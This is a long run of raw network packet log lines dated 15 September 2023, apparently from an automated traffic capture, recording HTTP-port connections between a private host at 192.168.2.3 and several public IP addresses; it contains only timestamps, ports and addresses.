                                                                                                                                                                              Sep 15, 2023 07:26:28.725054979 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725080013 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725094080 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725116014 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725133896 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725155115 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725159883 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725207090 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725234032 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725269079 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725281000 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725317001 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725584984 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725684881 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725697041 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725723982 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725732088 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725770950 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725827932 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725863934 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725893021 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725924015 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.726202011 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.726242065 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.726277113 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.726305008 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.726319075 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728151083 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728192091 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728230000 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728267908 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728271008 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728305101 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728339911 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728339911 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728342056 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728369951 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728384018 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728389978 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728432894 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728574038 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728610992 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728636980 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728650093 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728668928 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728705883 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728715897 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728744030 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728746891 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728780985 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728785992 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728817940 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.728821993 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.728861094 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729448080 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729527950 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729566097 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729567051 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729593039 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729603052 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729617119 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729640961 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729648113 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729677916 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729681969 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729716063 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.729717970 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.729760885 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730407953 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730451107 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730489969 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730528116 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730529070 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730564117 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730597973 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730597973 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730601072 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730631113 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730633020 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.730649948 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.730674982 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760185003 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760225058 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760266066 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760303020 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760315895 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760340929 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760361910 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760389090 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760499954 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760536909 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760572910 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760577917 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760586023 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760616064 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760622025 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760664940 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.760674953 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.760746002 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761075974 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761116028 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761149883 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761187077 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761214972 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761372089 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761411905 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761450052 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761471987 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761483908 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761499882 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761545897 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761770964 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761807919 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761816025 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761847973 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761857033 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761883974 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761884928 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761924982 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761933088 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761964083 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.761972904 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.761993885 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762001038 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762042999 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762712002 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762749910 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762785912 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762825012 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762850046 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762861967 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762883902 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762897968 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762917995 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762938976 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.762938976 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.762981892 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.763521910 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.763643980 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.766828060 CEST804984481.2.194.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.766897917 CEST4984480192.168.2.381.2.194.241
                                                                                                                                                                              Sep 15, 2023 07:26:28.815247059 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.815351009 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:28.842924118 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:28.844477892 CEST4985780192.168.2.364.125.133.18
                                                                                                                                                                              Sep 15, 2023 07:26:28.849700928 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:28.893716097 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.893806934 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:28.954140902 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.955447912 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.955512047 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:28.955528975 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.955589056 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:28.969136000 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.025544882 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.025645971 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.025896072 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.111706018 CEST4986180192.168.2.3104.196.26.65
                                                                                                                                                                              Sep 15, 2023 07:26:29.134368896 CEST804985969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.134478092 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.165625095 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.201658010 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.243604898 CEST8049861104.196.26.65192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.243733883 CEST4986180192.168.2.3104.196.26.65
                                                                                                                                                                              Sep 15, 2023 07:26:29.247622013 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.247673988 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.247704029 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.247713089 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.247735023 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.247750998 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.247754097 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.247795105 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272062063 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272103071 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272140026 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272147894 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272167921 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272183895 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272191048 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272221088 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272233963 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272259951 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.272260904 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.272303104 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.313879967 CEST8049818108.167.164.216192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.313997030 CEST4981880192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:29.330959082 CEST804985969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.332086086 CEST804985969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.332168102 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.332832098 CEST804985969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.332899094 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.423561096 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423603058 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423651934 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423671007 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423682928 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423736095 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423759937 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423798084 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423805952 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423841000 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423868895 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423912048 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.423945904 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.423994064 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.424019098 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.424067974 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.447913885 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.447954893 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.447990894 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.447992086 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448014975 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448029995 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448036909 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448071003 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448081970 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448107004 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448112011 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448148012 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448163986 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448203087 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448205948 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448237896 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448241949 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448273897 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448281050 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448309898 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448313951 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448353052 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.448355913 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.448394060 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.450452089 CEST4986180192.168.2.3104.196.26.65
                                                                                                                                                                              Sep 15, 2023 07:26:29.452059031 CEST4985980192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.515100956 CEST4986280192.168.2.369.163.218.51
                                                                                                                                                                              Sep 15, 2023 07:26:29.581176043 CEST8049861104.196.26.65192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.583812952 CEST8049861104.196.26.65192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.583873034 CEST4986180192.168.2.3104.196.26.65
                                                                                                                                                                              Sep 15, 2023 07:26:29.599571943 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599637032 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599654913 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599680901 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599692106 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599723101 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599733114 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599762917 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599769115 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599802017 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599807978 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599842072 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599847078 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599880934 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599886894 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599920034 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599924088 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599957943 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.599963903 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.599997044 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600003004 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600033998 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600039959 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600074053 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600078106 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600111961 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600116014 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600148916 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600157022 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600187063 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.600191116 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.600227118 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.604690075 CEST4986180192.168.2.3104.196.26.65
                                                                                                                                                                              Sep 15, 2023 07:26:29.617151976 CEST804985969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.623985052 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624022961 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624042034 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624058008 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624072075 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624102116 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624134064 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624172926 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624182940 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624211073 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624218941 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624253035 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624285936 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624322891 CEST8049858217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:29.624334097 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624368906 CEST4985880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:29.624434948 CEST8049858217.79.184.35192.168.2.3
